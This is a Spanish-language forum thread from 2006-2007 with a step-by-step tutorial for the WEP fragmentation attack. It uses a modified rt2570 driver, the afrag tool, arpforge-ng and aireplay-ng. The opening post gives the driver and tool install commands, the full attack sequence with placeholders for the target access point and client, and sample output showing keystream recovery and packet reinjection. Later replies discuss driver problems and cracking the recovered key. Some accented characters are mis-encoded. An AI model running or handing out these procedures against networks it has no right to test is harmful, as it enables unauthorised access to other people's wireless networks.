Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
13-03-2010, 14:12:43 (Sábado)
Inicio Ayuda Reglas Ingresar Registrarse
Noticias: El Mercadillo de CiudadWireless

 
Portes gratis para usuarios del foro en www.ciudadwireless.com
+  Seguridad Wireless - Wifi
|-+  Gadgets Sin Cables
| |-+  Universo Wireless
| | |-+  Manuales wireless
| | | |-+  Ataque de fragmentaci贸n con driver rt2570 modificado por ASPj .....AFRAG
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 2 » Ir Abajo Imprimir
Autor Tema: Ataque de fragmentaci贸n con driver rt2570 modificado por ASPj .....AFRAG  (Leído 19051 veces)
*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« : 18-11-2006, 17:07:03 (Sábado) »

La verdad que he visto muy poca informaci贸n sobre este ataque....hasta para mi que aun no ha sido testeado del todo..... :rolleyes:.....pero bueno para eso estamos nosotr*s........

Se ve que este ataque solo lo soportan las tarjetas USB con driver rt2xx0, aunque llegara el dia en los demas chipsets tb....

Parece ser que los routers que se resisten al chopchop , son altamente vulnerables con el Ataque de fragmentaci贸n

Aparte,recomiendo que lo hagais con la distro de Back Track 2.0 Beta,,con troppix 1.2 no me ha funcionado....en el foro de aircrack-ng dicen que con ubuntu tampoco...TODO ES PROBAR

Link de Back Track 2.0 Beta

http://www.remote-exploit.org/index.php/BackTrack_Downloads

Lo primero que he echo es instalar el driver nuevo.........y he conseguido que no se "caiga"... Grin

drivers : rt2570-k2wrlz-1.4.9

link: http://homepages.tu-darmstadt.de/~p_larbig/wlan/

Necesitamos inet con otra tarjeta para que funcione este script
Sino ya sabeis, os descargais el paquete comprimido y luego lo haceis manualmente, exceptuando el paso de la orden wget

Codigo:
Citar
ifconfig rausb0 down

rmmod rt2570

wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.4.9.tar.bz2

tar -xvjf rt2570-k2wrlz-1.4.9.tar.bz2

cd rt2570-k2wrlz-1.4.9/Module

make && make install

modprobe rt2570

ifconfig rausb0 up



Ahora instalamos la suite del aircrack-ng Mother Fucker Edition 0.8....pq no se pq pero ASPj dice que mejor el arpforge que el packetforge que lleva el Back Track 2.0 Beta..........y que razon tiene...

Podemos descargar el aircrack-ng Mother Fucker Edition 0.8 de.............
 http://hwagm.elhacker.net/ 

O usar este script teniendo internet.................

Citar
wget http://www.bluntmen.com/aircrack-ng-0.6_motherfucker_edition_0.8.tar.gz
tar -zxvf aircrack-ng-0.6_motherfucker_edition_0.8.tar.gz
cd aircrack-ng-0.6_motherfucker_edition_0.8
make && make install

Una vez ya tenemos esto instalado, instalamos la aplicaci贸n afrag

Hay dos maneras,,,o desde el aircrack o bajandolo y compilandolo

MANERA 1
***********
La suite del aircrack lleva un Makefile, nos vamos a...

Citar

cd /dnd_este_el_aircrack/aircrack-ng-0.6_motherfucker_edition_0.8/complementos/afrag-0.1/
make && make install

MANERA 2 (recomiendo esta,pq es la que me ha funcionado)
**************************************************
Nos vamos a esta pagina
http://homepages.tu-darmstadt.de/~p_larbig/wlan/
y nos descargamos afrag-0.1.tar.bz2

Codigo:
Citar

cp /dnd_lo_tengais/afrag-0.1.tar.bz2  /dndesteaircrack

  bzip2 -dc afrag-0.1.tar.bz2 | tar -xv
cd afrag-0.1
gcc -o afrag afrag.c  //compilamos


Ya tenemos todo listo....... Grin Grin
Os dejo el proceso y el manual-readme de ASPj........

Citar
#Activamos la tarjeta
ifconfig rausb0 up

#ponemos la tarjeta a punto
iwconfig rausb0 rate 1M channel [CANAL_DEL_AP] mode  monitor

#Capturamos con airodump
airodump-ng --ivs -w fragmentacion -c [CANAL_DEL_AP] rausb0

#Creamos el .xor para forjar el ARP....esto es la #fragmentaci贸n.........Con el keystream podemos...
# Tarda unos 10 segundos m谩s o menos.......si todo va bien
./afrag rausb0 [MAC_AP] [MAC_CLIENTE] FF:FF:FF:FF:FF:FF 192.168.1.23 192.168.1.24 dudu.xor

#Forjamos nuestro queridimo ARP,para que funcione pondra: Done
arpforge-ng dudu.xor 1   [MAC_AP] [MAC_CLIENTE]  192.168.1.23 192.168.1.24 test.cap

# Lo reinyectamos.........con Aireplay -2
aireplay-ng -2 rausb0 -r test.cap

Y veriamos como los datas incrementan en el airodump.......... Grin Grin


AQUI OS MUESTRO EL README DEL AFRAG DE ASPj........

Citar
haquetop2:/afrag-0.1 # gcc -o afrag afrag.c
afrag.c:888:2: warning: no newline at end of file
haquetop2:/afrag-0.1 # ./afrag
ieee80211rawframework: Need to know your device!
haquetop2:/afrag-0.1 # ./afrag rausb0
USAGE: ./afrag <interface> <BSSID> <Client1MAC> <Client2MAC> <SrcIP> <DestIP> <PRGA-Output-Filename>
haquetop2:/afrag-0.1 # ifconfig rausb0 up
haquetop2:/afrag-0.1 # iwconfig rausb0 rate 1M channel 1 mode monitor
haquetop2:/afrag-0.1 # ./afrag rausb0 00:0F:B5:59:29:16 00:12:F0:2E:B9:34 FF:FF:FF:FF:FF:FF 192.168.1.23 192.168.1.24 test.xor
Waiting for a data packet...
Data packet found!
Keystream (recovered 7 bytes):
        Size: 7, FromDS: 1, ToDS: 0
        0x0000:  301e 313a 401e b5                        0.1:@..
Sending fragmented packet
Packet:
        Size: 60, FromDS: 0, ToDS: 1 (WEP)
        0x0000:  0841 9500 000f b559 2916 0012 f02e b934  .A.....Y)......4
        0x0010:  ffff ffff ffff 0000 aaaa 0300 0000 0806  ................
        0x0020:  0001 0800 0604 0001 0012 f02e b934 c0a8  .............4..
        0x0030:  0117 0000 0000 0000 c0a8 0118            ............
No answer, repeating...
Trying a LLC NULL packet
Sending fragmented packet
Packet:
        Size: 63, FromDS: 0, ToDS: 1 (WEP)
        0x0000:  0841 9500 000f b559 2916 0012 f02e b934  .A.....Y)......4
        0x0010:  ffff ffff ffff 0000 0000 0000 0000 0000  ................
        0x0020:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0030:  0000 0000 0000 0000 0000 0000 0000 00    ...............
No answer, repeating...
Sending fragmented packet
Packet:
        Size: 60, FromDS: 0, ToDS: 1 (WEP)
        0x0000:  0841 9500 000f b559 2916 0012 f02e b934  .A.....Y)......4
        0x0010:  ffff ffff ffff 0000 aaaa 0300 0000 0806  ................
        0x0020:  0001 0800 0604 0001 0012 f02e b934 c0a8  .............4..
        0x0030:  0117 0000 0000 0000 c0a8 0118            ............
Got RELAYED packet!!
Data packet sniffed:
        Size: 71, FromDS: 1, ToDS: 0 (WEP)
        0x0000:  0842 9500 ffff ffff ffff 000f b559 2916  .B...........Y).
        0x0010:  0012 f02e b934 2009 0000 1800 df12 1f0f  .....4 .........
        0x0020:  b4b1 a561 1e67 4879 cbdc 8668 87b6 43ee  ...a.gHy...h..C.
        0x0030:  22da 739f fd26 8450 21fc bda8 d90c 84b6  ".s..&.P!.......
        0x0040:  a55f bb1c 4ff7 e8                        ._..O..
Thats our LLC Null packet!
Resulting keystream:
        Size: 36, FromDS: 1, ToDS: 0
        0x0000:  df12 1f0f b4b1 a561 1e67 4879 cbdc 8668  .......a.gHy...h
        0x0010:  87b6 43ee 22da 739f fd26 8450 21fc bda8  ..C.".s..&.P!...
        0x0020:  d90c 84b6                                ....
Trying to get 408 bytes of a keystream
Packet:
        Size: 408, FromDS: 0, ToDS: 1 (WEP)
        0x0000:  0841 9500 000f b559 2916 0012 f02e b934  .A.....Y)......4
        0x0010:  ffff ffff ffff 0000 aaaa 0300 0000 0806  ................
        0x0020:  0001 0800 0604 0001 0012 f02e b934 c0a8  .............4..
        0x0030:  0117 0000 0000 0000 c0a8 0118 0000 0000  ................
        0x0040:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0050:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0060:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0070:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0080:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0090:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00a0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00b0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00c0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00d0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        --- CUT ---
No answer, repeating...
Trying a LLC NULL packet
Packet:
        Size: 440, FromDS: 0, ToDS: 1 (WEP)
        0x0000:  0841 9500 000f b559 2916 0012 f02e b934  .A.....Y)......4
        0x0010:  ffff ffff ffff 0000 0000 0000 0000 0000  ................
        0x0020:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0030:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0040:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0050:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0060:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0070:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0080:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0090:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00a0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00b0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00c0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00d0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        --- CUT ---
Got RELAYED packet!!
Thats our LLC Null packet!
Resulting keystream:
        Size: 432, FromDS: 0, ToDS: 1
        0x0000:  24d5 bb04 db54 0679 ce1c 4cc9 e25f ea99  $....T.y..L.._..
        0x0010:  9ce3 3fa7 0519 6dbe c761 fbb1 a9cf 741a  ..?...m..a....t.
        0x0020:  6ba2 3c42 db11 4d3d d52c 8acf d5c0 3b6b  k.<B..M=.,....;k
        0x0030:  ac21 b301 d66c 4040 5fe6 72f4 61a6 d1dd  .!...l@@_.r.a...
        0x0040:  0d00 d328 d801 b36b cdeb 0f3a 3fd1 2f48  ...(...k...:?./H
        0x0050:  551c 8321 d786 5c59 6c44 566d 0517 c213  U..!..\YlDVm....
        0x0060:  5aeb d1a3 7890 1554 2aec 9a8a 53f9 f985  Z...x..T*...S...
        0x0070:  6b89 4820 3ed3 f942 cddb c6de 5789 03a9  k.H >..B....W...
        0x0080:  10a9 724b 0061 deaa 36d5 be58 864a 6145  ..rK.a..6..X.JaE
        0x0090:  9396 0520 9d50 4930 0dce f22b 0cc6 cda0  ... .PI0...+....
        0x00a0:  3ee9 6a14 2220 d8b8 c1ed 16cd 6855 9d44  >.j." ......hU.D
        0x00b0:  75e3 248a 9f9b e5aa ba17 4f64 6ab4 0dad  u.$.......Odj...
        0x00c0:  fe22 6a20 6374 93d8 0886 5f29 6373 3ca5  ."j ct...._)cs<.
        0x00d0:  0a9c 2e08 e9fe d31c e467 ce93 6535 6346  .........g..e5cF
        --- CUT ---
Now you can build a packet with packetforge-ng out of that keystream

haquetop2:/afrag-0.1 # arpforge-ng

  Arpforge-ng 0.6 - (C) 2006 Thomas d'Otreppe
  Original work: Christophe Devine
  http://www.aircrack-ng.org
  usage: arpforge-ng <prga file> <type> <bssid> <mac src>
                     <ip src> <ip dest> <output filename>

haquetop2:/afrag-0.1 # arpforge-ng test.xor 1 00:0F:B5:59:29:16 00:12:F0:2E:B9:34 192.168.1.23 192.168.1.24 test.cap
Done.
haquetop2:/afrag-0.1 # aireplay-ng -2 rausb0 -r test.cap


        Size: 68, FromDS: 0, ToDS: 1 (WEP)

             BSSID  =  00:0F:B5:59:29:16
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
        Source MAC  =  00:12:F0:2E:B9:34

        0x0000:  0841 0201 000f b559 2916 0012 f02e b934  .A.....Y)......4
        0x0010:  ffff ffff ffff 8001 0000 2100 8e7f b804  ..........!....
        0x0020:  db54 0e7f ce1d 44c9 e45b ea98 9cf1 cf89  .T...D..[......
        0x0030:  bc2d ad16 c676 fbb1 a9cf 741a ab0a 3d5a  .-...v....t...=Z
        0x0040:  bab3 161e                                ....

Use this packet ? y

Saving chosen packet in replay_src-0929-032919.cap
You should also start airodump-ng to capture replies.




HAVE a LOT of FUN and please don't forget to report back. THANK YOU!

ASPj

Aqui unas capturas del ataque de fragmentaci贸n........


ERROR TIPICO......




CONSEGUIDA LA FRAGMENTACI脫N


AQUI ESTA TODO RESUMIDO.....REINYECTANDO........



LINKS:

http://foro.elhacker.net/index.php?action=post;msg=694402;topic=147959.0;sesc=2859e156e8bb10004450fadd9bb990f8
http://tinyshell.be/aircrackng/forum/index.php?topic=14.15
http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/4
http://toorcon.org/2005/slides/abittau/slides.pdf
http://homepages.tu-darmstadt.de/~p_larbig/wlan/
« Última modificación: 28-03-2008, 03:54:57 (Viernes) por unbAs » En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12527



WWW
« Respuesta #1 : 18-11-2006, 21:26:45 (Sábado) »

 Wink

http://hwagm.elhacker.net/htm/fragmentacion.htm

a ver si te gusta
En línea

*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #2 : 18-11-2006, 21:34:55 (Sábado) »

ese color azul brutal!!!!!! Grin Grin Grin

lo unico que veo,,,es que el nombre no es muy intuitivo......
y los links del final?Huh son los anexos en los que me he informao......
no te parece que esta bien meterlos???
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #3 : 18-11-2006, 21:38:11 (Sábado) »

Citar
Parece ser que los routers que se resisten al chopchop, son altamente vulnerables con el Ataque de fragmentaci贸n

 Wink Wink Wink

hay estamos...lo queria cambiar de hecho,,,perfecto hwagm!!!
con clase


a y una cosa que habia pensado........Remarcar las pausas

son 4 cosas que deben quedar separadas......

1- INSTALACION DEL DRIVER
2-INSTALACION DEL AIRCRACK-NG MFE 0.8
3.-INSTALACION DEL AFRAG

4-PROCESO

parece como muy apelotonado.....pero es por mi Embarrassed
« Última modificación: 18-11-2006, 21:42:50 (Sábado) por *dudux » En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12527



WWW
« Respuesta #4 : 18-11-2006, 22:20:20 (Sábado) »

dame tiempo esque 3 dias offline, pues voy de culo
En línea

Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12527



WWW
« Respuesta #5 : 19-11-2006, 00:32:35 (Domingo) »

Yo creo que ahora si te va a gustar mas.

http://hwagm.elhacker.net/htm/fragmentacion.htm
En línea

*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #6 : 19-11-2006, 17:36:24 (Domingo) »

 :Smiley
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12527



WWW
« Respuesta #7 : 23-11-2006, 21:32:14 (Jueves) »

actualizado  Wink
En línea

thefkboss
Colaborador
******
Desconectado Desconectado

Mensajes: 645



« Respuesta #8 : 23-11-2006, 21:54:53 (Jueves) »

ha quedado de PM
somos la envidea de otros foros.jajaja
Hwagm seguro q se te van a disparar las visitas y alcanzaras nuevo record, q no?Huh ya me diras
En línea
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12527



WWW
« Respuesta #9 : 23-11-2006, 21:58:58 (Jueves) »

PUes el servidor se sostiene a duras penas, cualquier dia peta. Pero esta deberia estar hasta en el meneame.net
« Última modificación: 23-11-2006, 22:02:06 (Jueves) por Hwagm » En línea

thefkboss
Colaborador
******
Desconectado Desconectado

Mensajes: 645



« Respuesta #10 : 24-11-2006, 15:17:36 (Viernes) »

a se me olvidaba hay una cosa mal en las explicacion en la parte de

IV  = texto cifrado  + PRGA esto no es cierto deberia ser asi.

PAQUETE ENCRIPTADO=IV + texto cifrado  + PRGA cuando puedas lo corrigues
En línea
*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #11 : 25-11-2006, 00:35:38 (Sábado) »

ok thefkboss.......mmercy....

avisare a Hwagm que lo cambie aqui......

este portal y elhacker.net son 2 muy buenos......tambien otros.... Cheesy
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12527



WWW
« Respuesta #12 : 25-11-2006, 11:47:00 (Sábado) »

ya lo hice
En línea

*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #13 : 29-11-2006, 11:45:00 (Miércoles) »

estas en todo........ Wink
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12527



WWW
« Respuesta #14 : 01-12-2006, 20:04:45 (Viernes) »

 Cheesy Cheesy Cheesy

mira


http://www.elhacker.net/
En línea

*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #15 : 17-12-2006, 16:24:40 (Domingo) »




                VIDEOS DEMOSTRACION


1)Ataque de fragmentacion con WifiSlax 1.1 beta
http://www.bluntmen.com/fragmentacion.htm

2)Ataque de fragmentacion Ubuntu  atheros

http://videos.aircrack-ng.org/frag-attack2.swf

3) M谩s videos
http://videos.aircrack-ng.org/
« Última modificación: 27-01-2007, 03:41:10 (Sábado) por *dudux » En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 12527



WWW
« Respuesta #16 : 08-01-2007, 00:52:15 (Lunes) »

el ultimo ya no rula,  Grin
En línea

*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #17 : 12-01-2007, 22:06:00 (Viernes) »

vas a tako!!!  Tongue
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
biker3
*
Desconectado Desconectado

Mensajes: 18


« Respuesta #18 : 08-02-2007, 01:11:11 (Jueves) »

Hola muchachos, he intentado probar este ataque nuevamente pero no me ha funcionado despu茅s de 5 minutos de capturas de paquetes con airfrag intentando encontrar uno bueno. Supongo que habr谩 coincidido que el AP de esta red es muy listo jajaja. Bueno tengo una duda, y es que tengo una Linksys con este chipset por USB hace ya algo m谩s de medio a帽o, y siempre que me pongo a capturar paquetes el proceso no tiene 茅xito, me explico, no es porque capture pocos o ninguno, sino porque luego cuando vuelvo al par de horas me encuentro con que en airodump no me aparece ningunda red, aireplay da error al asociarse como si el dispositivo no existiese... es curioso, porque cierro airodump, lo vuelvo a abrir y nada... es como si la interfaz se hubiera quedado sorda y no encontrada nada.
Pues en cuanto la deshabilito con un ifconfig rausb0 down, y la vuelvo a habilitar... funciona de nuevo.

Esto me ha pasado con los drivers 1.0.0 con los 1.4.0 de la web esa que mencionais en el tutorial, tambi茅n con los 1.4.9 creo recordan que tambi茅n (de todas maneras sobre esta versi贸n se advierte en la web que es posible que falle reinyectando). Esto me ha pasado tanto en Ubuntu como en Debian, probando en un dos port谩tiles y en un sobremesa. Actualmente en el port谩til en el que la uso me pasa incluso con un n煤cleo compilado sin tener habilitado PREEMPT ni SMP. Ah y a veces, desde linux, estoy en modo managed y debe suceder esto tambi茅n, porque de repente dejan de abrirse las webs y no contesta ni al ping al gateway, lo cual se arregla como ya os he comentado con deshabilitar y volver a habilitar.

Entonces mi pregunta es si a vosotros eso os pasa, porque a lo mejor es que los drivers son as铆 de inestables, o jam谩s os ha pasado, para entonces ir a la tienda y decir que la interfaz me falla, que aunque en Windows no me pase, pero prefiero decirles que si porque paso de discutir con ellos lo t铆pico de que si es q este producto es para Windows (lo cual es mentira porque en el CD van drivers para Linux, pero ya conoc茅is a los de las tiendas y fabricantes Undecided)

Un saludo y gracias por investigar todas estas t茅cnicas Wink
En línea
*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #19 : 08-02-2007, 01:39:56 (Jueves) »

Citar
Esto me ha pasado con los drivers 1.0.0 con los 1.4.0 de la web esa que mencionais en el tutorial, tambi茅n con los 1.4.9 creo recordan que tambi茅n (de todas maneras sobre esta versi贸n se advierte en la web que es posible que falle reinyectando).

en el manual solo menciono los drivers 1.4.9,que son modificados para usar AFRAG,,,,,sin este driver no funcionaria el ataque

Citar
Hola muchachos, he intentado probar este ataque nuevamente pero no me ha funcionado despu茅s de 5 minutos de capturas de paquetes con airfrag intentando encontrar uno bueno. Supongo que habr谩 coincidido que el AP de esta red es muy listo jajaja.

no siempre funciona,,,pero funciona bastantes veces........
a mi no me funciona cuando a veces tampoco me funciona el A1+A3 de aireplay....
sigue probando y veras


Citar
Bueno tengo una duda, y es que tengo una Linksys con este chipset por USB hace ya algo m谩s de medio a帽o, y siempre que me pongo a capturar paquetes el proceso no tiene 茅xito, me explico, no es porque capture pocos o ninguno, sino porque luego cuando vuelvo al par de horas me encuentro con que en airodump no me aparece ningunda red, aireplay da error al asociarse como si el dispositivo no existiese... es curioso, porque cierro airodump, lo vuelvo a abrir y nada... es como si la interfaz se hubiera quedado sorda y no encontrada nada.
Pues en cuanto la deshabilito con un ifconfig rausb0 down, y la vuelvo a habilitar... funciona de nuevo.

efectivamente........yo creo que es por los drivers o porque se calienta el USB o que se.....pero esi....con ningun driver que yo probe consegui que no me pasara eso........como mucho 2 horas de conexion,,,,si encuentras alguno que no te pase DIMELO!

Citar
. Esto me ha pasado tanto en Ubuntu como en Debian, probando en un dos port谩tiles y en un sobremesa. Actualmente en el port谩til en el que la uso me pasa incluso con un n煤cleo compilado sin tener habilitado PREEMPT ni SMP. Ah y a veces, desde linux, estoy en modo managed y debe suceder esto tambi茅n, porque de repente dejan de abrirse las webs y no contesta ni al ping al gateway, lo cual se arregla como ya os he comentado con deshabilitar y volver a habilitar.

a mi en lives instalado para ese momento.......
y en debian  tambien


Citar
Entonces mi pregunta es si a vosotros eso os pasa, porque a lo mejor es que los drivers son as铆 de inestables, o jam谩s os ha pasado, para entonces ir a la tienda y decir que la interfaz me falla, que aunque en Windows no me pase, pero prefiero decirles que si porque paso de discutir con ellos lo t铆pico de que si es q este producto es para Windows (lo cual es mentira porque en el CD van drivers para Linux, pero ya conoc茅is a los de las tiendas y fabricante

mi respuesta es que si tienes el ticket y te la cambian dimelo,,,,,
aunque me darian el nuevo chipset rt73...... Cry
y ya no habria fragmentacion,,,,,
haber si le meten mano al codigo y lo standarizan ya de una vez
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
biker3
*
Desconectado Desconectado

Mensajes: 18


« Respuesta #20 : 08-02-2007, 13:35:38 (Jueves) »

Hola!!! Muchas gracias por tu r谩pida atenci贸n Cheesy Ya bueno, no siento que lo mio sea un problema aislado jeje. Es que en los foros de serialmonkey siempre me sal铆an por el mismo tema de que si deshabilitara PREEMPT y SMP compilando un n煤cleo, a pesar de que yo les insist铆a en que ya lo hab铆a hecho as铆 jeje.

Un saludo y 谩nimo con la interfaz
En línea
*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #21 : 08-02-2007, 14:10:40 (Jueves) »

Hola!!! Muchas gracias por tu r谩pida atenci贸n Cheesy Ya bueno, no siento que lo mio sea un problema aislado jeje. Es que en los foros de serialmonkey siempre me sal铆an por el mismo tema de que si deshabilitara PREEMPT y SMP compilando un n煤cleo, a pesar de que yo les insist铆a en que ya lo hab铆a hecho as铆 jeje.

Un saludo y 谩nimo con la interfaz

 Wink  para que ddeshabilitas PREEMPT y SMP  cuando compilas el kernel?
 afecta a la c54ru???

saludos y animo con la interfaz!! jajajja
Cheesy
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
biker3
*
Desconectado Desconectado

Mensajes: 18


« Respuesta #22 : 08-02-2007, 20:47:54 (Jueves) »

Es que en los foros esos de serialmonkey lo dicen. No s茅 para las conceptronic, ah铆 lo dicen para todos los dispositivos que usen el rt2570. Cada vez que alguien comenta que si se le cuelga la interfaz o tal... la respuesta por primicia es esa, que si ha deshabilitado PREEMPT y SMP. El primero supongo que podr铆a tener que ver con que si el ordenador se pone en un modo de bajo consumo podr铆a llegar a deshabilitar algunos dispositivos USB, y se ve que el driver de estos chismes no est谩 muy logrado y Linux lo apaga xD. Sobre el soporte ese para multiprocesador de SMP pues no s茅 en qu茅 tendr谩 que ver, la verdad que me jode la faena porque hago las cosas en un Core 2 Duo y ya ves t煤... para mi n煤cleo compilado para esto mi ordenador es de un procesador y adem谩s el ventilador lo oigo funcionar m谩s que cuando arranco desde un n煤cleo con SMP y PREEMPT jeje.

Creo que la versi贸n esa de drivers rt2x00 no necesitan desactivar esas cosas, pero las 煤ltimas versiones que yo mir茅 dec铆an que no soportaban reinyecci贸n Undecided

ah铆 va un ejempo: h**p://rt2x00.serialmonkey.com/phpBB2/viewtopic.php?t=2856&highlight=preempt+smp
y como ese hay tropecientos temas en esos foros de los desarrolladores jeje. Mira a ver, lo mismo a t铆 deshabilitando esas cosas te va la interfaz al pelo Cheesy
En línea
*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #23 : 09-02-2007, 14:08:53 (Viernes) »

http://rt2x00.serialmonkey.com/phpBB2/viewtopic.php?t=2856&highlight=preempt+smp

yo no tengo doble nucleo (SMP) lo tengo ya desactivado en el kernel y compilado para que no ....EEPREM no me acuerdo........

probare estos drivers haber que tal soportan solamente el modo managed,.....si lo aguantan seria bastante intereseante.......

mercy

saludos


p.d. tienes chipset rt73 o rt2570??

Citar
lsusb
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
biker3
*
Desconectado Desconectado

Mensajes: 18


« Respuesta #24 : 09-02-2007, 21:19:50 (Viernes) »

Hola! Es un chipset rt2570, concretamente montado en una Linksys WUSB54G Smiley
En línea
*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #25 : 10-02-2007, 05:39:58 (Sábado) »

sigue probandolo y ver谩s...... Grin
algo bueno tiene esta tarjeta,,,,,,tienes muchas posibilidades....
a mi los A1 o autentificaciones falsas me funcionan mejor con el USB que con las atheros PCI y PCMCIA.......
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #26 : 17-02-2007, 16:45:26 (Sábado) »

ATAQUE DE FRAGMENTACION CON ATHEROS SIN CLIENTES

Video: http://video.aircrack-ng.org/noclient/
Tutorial: http://aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients


NUEVO DRIVER "ESTABLE" PARA EL  ATAQUE DE FRAGMENTACION

http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.5.0.tar.bz2


INSTALACION DEL DRIVER.........

Citar
ifconfig rausb0 down

rmmod rt2570

wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.5.0.tar.bz2

tar -xvjf rt2570-k2wrlz-1.5.0.tar.bz2

cd rt2570-k2wrlz-1.5.0/Module

make clean && make && make install

modprobe rt2570

ifconfig rausb0 up


Aseguraros que lo habeis instalao bien:
Citar

:/home/dudu# dmesg | grep RT25
RT25usb  Driver version 1.5.0
:/home/dudu# lsmod | grep rt
rt2570                153920  1








« Última modificación: 17-02-2007, 18:02:20 (Sábado) por *dudux » En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
apokeklipse
*
Desconectado Desconectado

Mensajes: 4


« Respuesta #27 : 18-02-2007, 20:20:23 (Domingo) »

Hola, ante todo gracias a todos por la p谩gina.
Estoy algo desorientado con el temita wifi... en realidad no tengo mucha idea. Estoy intentando recuperar una clave wep (de mi propio equipo, para comprobar su seguridad), con el live cd. He seguido paso por paso los manuales y tal, y todo bien, he conseguido llegar, gracias a los tutoriales,  con la fragmentaci贸n a cuando pone "Sent [n煤mero] packets...", es decir al final del tutorial, perooo y ahora? Han llegado a unos 2 millones y nada, tengo q hacer algo para recuperar la clave o seguir esperando? Graciaaas. Si puede estar explicado para profanos, estar茅 eternamente agradecido. Smiley
En línea
pianista
Chopchoping
Moderador Global
******
Desconectado Desconectado

Mensajes: 1849



WWW
« Respuesta #28 : 18-02-2007, 22:33:59 (Domingo) »

Pero una preguntita, quieres sacar la pass con fragmentacion o simplemente la quieres sacar con cualquier cosa Grin Grin Grin
Si tienes 2 millones de datas en el airodump pues pasale el aircrack y ya te saldra...
Saludosss
En línea

apokeklipse
*
Desconectado Desconectado

Mensajes: 4


« Respuesta #29 : 18-02-2007, 23:56:08 (Domingo) »

Puess.. He intentado pasar el aircrack pero como no s茅 c贸mo funciona, he vuelto a hacer todo el proceso... y cuando ya est谩 corriendo y subiendo el "sent # packets" paso el aircrack y dice algo como: "Recibido 1 paquete      No hay redes, saliendo", se corta el aircrack y lo otro sigue subiendo...
En línea
*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #30 : 19-02-2007, 02:02:18 (Lunes) »

si no te da la clave solo te queda capturar mas paquetes........

